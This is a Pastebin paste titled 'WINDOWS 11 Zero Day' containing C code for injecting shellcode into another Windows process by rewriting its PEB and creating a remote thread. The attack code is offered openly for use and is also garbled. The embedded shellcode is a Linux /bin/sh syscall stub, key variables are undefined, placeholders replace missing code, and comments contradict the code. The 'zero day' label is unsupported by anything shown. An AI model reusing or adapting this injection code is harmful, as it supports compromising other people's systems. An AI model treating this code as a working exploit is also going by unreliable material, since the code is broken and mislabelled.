API tools faq
paste
Advertisement
Sweetening

WINDOWS 11 Zero Day

Sweetening
Apr 8th, 2024
50
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
raw download clone embed print report
  1. #include <windows.h>
  2. #include <stdio.h>
  3. #include <tlhelp32.h>
  4. #include <winternl.h> // For PEB
  5.  
  6. #pragma comment(lib, "ntdll.lib")
  7. #pragma comment(lib, "kernel32.lib")
  8.  
  9. const char* shellcode =
  10. "\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e"
  11. "\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05";
  12.  
  13. BOOL InjectShellCode(DWORD pid, const char* moduleName, const char* functionSymbol) {
  14. // ... (previous code)
  15.  
  16. // Modify the atom table of the ntdll.dll module in the target process
  17. PEB peb = { 0 };
  18. if (!ReadProcessMemory(hProcess, pPebAddress, &peb, sizeof(peb), NULL)) {
  19. printf("Failed to read the PEB of the target process (error: %d)\n", GetLastError());
  20. CloseHandle(hProcess);
  21. VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
  22. return FALSE;
  23. }
  24.  
  25. // Replace the atom table of the target process
  26. peb.GdiSharedHandleTable = (ULONG_PTR)pRemoteShellcode;
  27.  
  28. if (!WriteProcessMemory(hProcess, pPebAddress, &peb, sizeof(peb), NULL)) {
  29. printf("Failed to modify the PEB of the target process (error: %d)\n", GetLastError());
  30. CloseHandle(hProcess);
  31. VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
  32. return FALSE;
  33. }
  34.  
  35. // Create a thread in the target process to execute the shellcode
  36. HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunction, NULL, 0, NULL);
  37. if (hThread == NULL) {
  38. printf("Failed to create remote thread in the target process (error: %d)\n", GetLastError());
  39. CloseHandle(hProcess);
  40. VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
  41. return FALSE;
  42. }
  43.  
  44. // Wait for the thread to finish
  45. WaitForSingleObject(hThread, INFINITE);
  46.  
  47. // Clean up
  48. CloseHandle(hThread);
  49. CloseHandle(hProcess);
  50. VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
  51.  
  52. return TRUE;
  53. }
  54.  
  55. int main() {
  56. DWORD targetPID = ...; // The target process PID
  57. const char* moduleName = "..."; // Module name
  58. const char* functionSymbol = "..."; // Function symbol
  59.  
  60. // ... (previous code)
  61.  
  62. BOOL success = InjectShellCode(targetPID, moduleName, functionSymbol);
  63. if (success) {
  64. printf("Shellcode injection successful!\n");
  65. } else {
  66. printf("Shellcode injection failed!\n");
  67. }
  68.  
  69. return 0;
  70. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!